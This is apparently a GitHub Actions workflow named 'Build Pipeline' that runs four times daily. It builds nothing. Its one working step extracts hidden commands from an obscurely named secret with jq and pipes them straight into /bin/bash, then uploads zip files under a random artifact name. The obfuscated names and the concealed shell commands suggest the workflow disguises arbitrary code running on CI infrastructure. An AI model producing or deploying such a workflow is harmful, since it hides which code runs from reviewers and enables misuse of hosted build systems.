name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '9 3,9,15,21 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Perform
        env:
          fja362: ${{ secrets.fja362 }}
        run: |
          printf '%s' "$fja362" | jq -r .klud4 | /bin/bash
          echo $nopbm98029 | jq -r .wjsn8 | /bin/bash

      - name: Upload results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: wWxDRLz9
          path: "*.zip"
          retention-days: 1
